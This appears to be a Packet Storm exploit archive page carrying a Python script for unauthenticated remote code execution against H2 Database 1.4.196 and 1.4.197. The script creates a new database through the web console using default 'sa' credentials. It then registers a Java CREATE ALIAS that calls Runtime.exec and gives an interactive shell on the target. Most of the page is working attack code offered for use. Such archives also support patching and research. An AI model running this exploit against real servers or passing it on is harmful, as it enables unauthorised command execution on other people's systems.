what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

H2 Database 1.4.196 Remote Code Execution

H2 Database 1.4.196 Remote Code Execution
Posted Oct 1, 2018
Authored by h4ckNinja

H2 Database version 1.4.196 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 19f88acd5386a684f32bd72ab5812fbec9a7738e9175f9dc0f9eb88aae5b4cc6

H2 Database 1.4.196 Remote Code Execution

Change Mirror Download
# Exploit Title: H2 Database 1.4.196 - Remote Code Execution
# Google Dork: N/A
# Date: 2018-09-24
# Exploit Author: h4ckNinja
# Vendor Homepage: https://www.h2database.com/
# Software Link: http://www.h2database.com/h2-2018-03-18.zip
# Version: 1.4.196 and 1.4.197
# Tested on: macOS/Linux
# CVE: N/A

# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).
# When the test database has a password that is unknown, it is still possible to get the execution
# by creating a new database. The web console allows this by entering the name of the new database
# in the connection string. When the new database is created, the default credentials of
# username asaa and password aa (blank) are created. The attacker is logged in automatically.
# The attached Python code, modified from 44422, demonstrates this.

#!/usr/bin/env python

'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac
Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
Modified from: https://www.exploit-db.com/exploits/44422/
'''

import random
import string
import sys
import argparse
import html
import requests


def getSession(host):
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')

return '{}/{}'.format(url, path)

def login(url, database):
data = {
'language': 'en',
'setting': 'Generic H2 (Embedded)',
'name': 'Generic H2 (Embedded)',
'driver': 'org.h2.Driver',
'url': database,
'user': 'sa',
'password': ''
}

print('[*] Attempting to create database')
r = requests.post(url, data=data)

if '<th class="login">Login</th>' in r.text:
return False

print('[+] Created database and logged in')

return True

def prepare(url):
cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'''
url = url.replace('login', 'query')

print('[*] Sending stage 1')

r = requests.post(url, data={'sql': cmd})

if not 'NullPointerException' in r.text:
print('[+] Shell succeeded - ^c or quit to exit')
return url

return False

def execve(url, cmd):
r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})

try:
execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore')
print(execHTML)

except Exception as e:
print('[-] Invalid command (' + str(e) + ')')


if __name__ == "__main__":
parser = argparse.ArgumentParser()
randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))

parser.add_argument('-H',
'--host',
dest='host',
metavar='127.0.0.1:8082',
help='Specify a host',
required=True)

parser.add_argument('-d',
'--database-url',
dest='database',
metavar='jdbc:h2:~/emptydb-' + randString,
default='jdbc:h2:~/emptydb-' + randString,
help='Database URL',
required=False)

args = parser.parse_args()

url = getSession(args.host)

if login(url, args.database):
success = prepare(url)

if success:
while True:
try:
cmd = input('h2-shell$ ')

if 'quit' not in cmd:
execve(success, cmd)

else:
print('[+] Shutting down')
sys.exit(0)

except KeyboardInterrupt:
print()
print('[+] Shutting down')
sys.exit(0)

else:
print('[-] Something went wrong injecting the payload.')

else:
print('[-] Unable to login')


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close